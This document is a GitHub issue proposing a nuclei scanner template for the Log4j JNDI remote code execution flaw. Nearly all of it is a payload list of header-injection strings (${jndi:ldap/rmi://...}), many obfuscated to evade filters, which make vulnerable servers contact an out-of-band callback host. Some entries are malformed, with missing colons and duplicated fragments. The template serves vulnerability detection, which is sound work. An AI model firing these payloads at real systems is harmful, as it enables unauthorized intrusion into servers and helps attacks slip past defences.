### ISSUE TITLE
[nuclei-template] Log4j JNDI RCE

### ISSUE THREAD

**Issue by test502git** [projectdiscovery/nuclei-templates#3331]
https://github.com/test502git/log4j-fuzz-head-poc

```yaml
id: log4j-fuzz-head-poc

info:
  name: log4j-rce漏洞
  author: tangshoupu
  severity: critical
  tags: apache,rce

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        {{log4j_payloads}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        {{log4j_payloads}}

    payloads:
      log4j_payloads:
        - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'User-Agent: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Referer: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'CF-Connecting_IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'True-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Forwarded-For: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Originating-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Real-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Forwarded: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Client-IP: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Contact: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Wap-Profile: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Api-Version: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'Host: ${jndi:ldap://{{interactsh-url}}/info}'
        - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Remote-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Remote-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Remote-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Remote-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Remote-Addr: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Remote-Addr: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Remote-Addr: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-Addr: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-Addr: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Remote-Addr: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Originating-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'User-Agent: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'User-Agent: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'User-Agent: ${jndi:rmi://{{interactsh-url}}}'
        - 'User-Agent: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'User-Agent: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'User-Agent: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'User-Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'Referer: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'Referer: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'Referer: ${jndi:rmi://{{interactsh-url}}}'
        - 'Referer: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Referer: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Referer: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'CF-Connecting_IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'CF-Connecting_IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'CF-Connecting_IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'CF-Connecting_IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'CF-Connecting_IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'CF-Connecting_IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'CF-Connecting_IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'True-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'True-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'True-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'True-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'True-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'True-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Forwarded-For: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Forwarded-For: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Forwarded-For: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'Originating-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'Originating-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'Originating-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'Originating-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Originating-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Originating-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Originating-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Real-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Real-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Real-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Real-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Real-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Real-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Real-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Client-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'Forwarded: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'Forwarded: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'Forwarded: ${jndi:rmi://{{interactsh-url}}}'
        - 'Forwarded: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Forwarded: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Forwarded: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Forwarded: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'Client-IP: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'Client-IP: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'Client-IP: ${jndi:rmi://{{interactsh-url}}}'
        - 'Client-IP: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Client-IP: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Client-IP: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Client-IP: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'Contact: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'Contact: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'Contact: ${jndi:rmi://{{interactsh-url}}}'
        - 'Contact: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Contact: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Contact: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'Contact: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Wap-Profile: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Wap-Profile: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Wap-Profile: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Wap-Profile: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Wap-Profile: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Wap-Profile: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}://{{interactsh-url}}/poc}'
        - 'X-Api-Version: ${${::-j}ndi:rmi://{{interactsh-url}}/ass}'
        - 'X-Api-Version: ${jndi:rmi://{{interactsh-url}}}'
        - 'X-Api-Version: ${${lower:jndi}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Api-Version: ${${lower: ${lower:jndi}}: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Api-Version: ${${lower:j}${lower:n}${lower:d}i: ${lower:rmi}://{{interactsh-url}}/poc}'
        - 'X-Api-Version: ${${lower:j}${upper:n}${lower:d}${upper:i}: ${lower:r}m${lower:i}}://{{interactsh-url}}/poc}'
        - 'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Remote-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Remote-Addrldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'User-Agentldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Refererldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'CF-Connecting_IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'True-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Forwarded-Forldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Originating-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Real-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Forwardedldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Client-IPldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Contactldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Wap-Profileldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Api-Versionldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'Hostldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type ${jndildap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Typeldapldap://{{interactsh-url}}/cn=JndiExploit,dc=apache,dc=org?Type=A Type//{{interactsh-url}}/info}'
        - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Remote-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Remote-Addr: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'User-Agent: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'Referer: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'CF-Connecting_IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'True-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Forwarded-For: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'Originating-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Real-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'Forwarded: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'Client-IP: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
        - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}'
                
    attack: clusterbomb
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
```
